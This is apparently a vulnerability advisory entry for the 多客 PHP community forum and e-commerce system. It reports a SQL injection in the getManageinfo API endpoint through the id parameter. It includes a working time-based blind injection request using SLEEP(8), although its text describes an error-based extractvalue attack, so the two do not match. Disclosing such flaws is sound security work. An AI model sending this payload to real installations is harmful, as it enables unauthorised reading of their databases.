多客圈子论坛系统 /api/index/quanManageList/getManageinfo SQL 注入漏洞

2026-04-30 多客圈子论坛系统 PoC Public

Description

多客是一款基于PHP开发的社区电商管理系统,提供商品管理、订单管理、会员管理、营销活动、分销管理等核心功能,支持多商户入驻、一键铺货、直播带货等业务模式,广泛应用于社区团购、生鲜电商、本地生活服务等场景。多客系统的 /api/index/quanManageList/getManageinfo 接口存在SQL注入漏洞,攻击者可通过id参数构造恶意的SQL语句,利用extractvalue函数进行基于错误的SQL注入,获取数据库敏感信息。

PoC

GET /api/index/quanManageList/getManageinfo?id=1%29+AND+%28SELECT+8888+FROM+%28SELECT%28SLEEP%288%29%29%29qBqH%29+AND+%288888%3D888 HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities